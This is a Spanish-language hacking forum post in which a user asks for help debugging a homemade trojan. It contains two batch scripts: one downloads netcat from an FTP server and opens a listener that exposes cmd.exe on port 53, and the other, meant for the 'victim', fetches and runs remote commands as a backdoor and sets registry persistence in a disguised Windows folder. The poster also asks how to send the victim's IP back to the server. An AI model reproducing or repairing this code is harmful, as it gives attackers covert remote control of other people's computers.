comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Ayuda con un Troyano?

  • 0 Respuestas
  • 651 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado 00000

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
  • Skype: -
« en: Diciembre 23, 2014, 12:44:36 am »
Buenas!.
La cuestión es la siguiente, tengo la duda de como programar un troyano de conexión directa del Cliente a un servidor FTP. En donde el Cliente ejecuta un  BATCH (o convertido a  .exe) , se conecta al servidor FTP , pide la descarga de un archivo en BATCH que contiene el siguiente codigo:


Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
[i]@echo off
echo USUARIO FTP>ftp1.txt
echo CONTRASEÑA FTP>>ftp1.txt
echo get nc.exe %appdata%/nc.exe
ftp -s:ftp1.txt FTP.SERVIDOR.COM
del /f /q ftp1.txt
%appdata%/nc.exe -l -p 53 -d -e cmd.exe
del /f /q %0[/i]


como ven este codigo almacena la herramienta NETCAT en el directorio %appdata% de win7 etc... y luego ejecuta un comando de escucha del puerto 53 con la consola de comandos de win habilitada.

Por otra parte este es el codigo del ejecutable que se le envia al Cliente ("victima"):


Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
[i]@echo off
pushd "%windir%\$NtUninstallWudf01000$\spuninst"
echo USUARIO FTP>ftp.tmp
echo CONTRASEÑA FTP>>ftp.tmp
echo get ordenes.txt>>ftp.tmp
echo bye>>ftp.tmp
echo quit>>ftp.tmp
ftp -s:ftp.tmp FTP.SERVIDOR.COM
del /f /q ftp.tmp
rename ordenes.txt backdoor.bat
start backdoor.bat
pushd "%homepath%\Mis documentos\Mis archivos recibidos"
copy /Y "troyano.bat" "%windir%\$NtUninstallWudf01000$\spuninst\troyano.bat"
reg
add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Uninstall"
/t Reg_SZ /d "%windir%\$NtUninstallWudf01000$\spuninst\troyano.bat
/f"
exit[/i]

La cuestion es que una vez que el Cliente de win7 ejecuta el troyano, este se conecta al FTP parece que esta todo OK. PERO!, el fichero nc.exe nunca se genera en el %appdata%.
Tambien mi duda era, como hacer con este troyano para que se me envie al FTP informacion de la IP PRIVADA del Cliente.
GRACIAS DE ANTEMANO.


 

¿Te gustó el post? COMPARTILO!



[SOLUCIONADO] Ayuda urgente con Virus "Virus.Win32Sality"

Iniciado por Napsters

Respuestas: 6
Vistas: 3346
Último mensaje Junio 11, 2012, 03:38:18 am
por Satyricon
"ayuda con fruitywifi-karma" no puedo activar el modulo karma.

Iniciado por cristobal92

Respuestas: 4
Vistas: 1175
Último mensaje Agosto 02, 2016, 12:03:45 pm
por cristobal92
[JAVA] Ayuda Sockets en Java

Iniciado por FERNANDX

Respuestas: 1
Vistas: 469
Último mensaje Abril 25, 2018, 08:49:50 pm
por Mortal_Poison
[Ayuda] Crear .zip o .rar de un "archivo"

Iniciado por Zentraedi

Respuestas: 5
Vistas: 1336
Último mensaje Marzo 03, 2017, 02:15:20 pm
por Zentraedi
[SOLUCIONADO] Ayuda Contraseña "Sqlmap"

Iniciado por djtrueno

Respuestas: 1
Vistas: 1252
Último mensaje Enero 17, 2014, 06:07:37 pm
por ANTRAX